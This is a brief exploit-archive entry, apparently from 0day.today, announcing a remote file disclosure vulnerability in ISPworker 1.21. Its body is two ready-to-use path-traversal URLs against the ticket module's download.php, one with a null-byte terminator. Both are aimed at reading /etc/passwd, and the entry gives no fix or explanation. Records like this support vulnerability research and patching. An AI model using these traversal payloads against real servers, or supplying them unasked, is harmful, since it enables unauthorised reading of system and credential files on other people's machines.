id: 2261
date: 10/31/2007
title: ISPworker 1.21 download.php Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

================================================================
ISPworker 1.21 download.php Remote File Disclosure Vulnerability
================================================================



ISPworker 1.21 Remote File Disclosure Vulnerability
http://ispworker.de/_files/ispworker-1.21.tar.gz
/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00
/module/ticket/download.php?filename=../../../../../../../../../etc/passwd




#  0day.today [2023-03-22]  #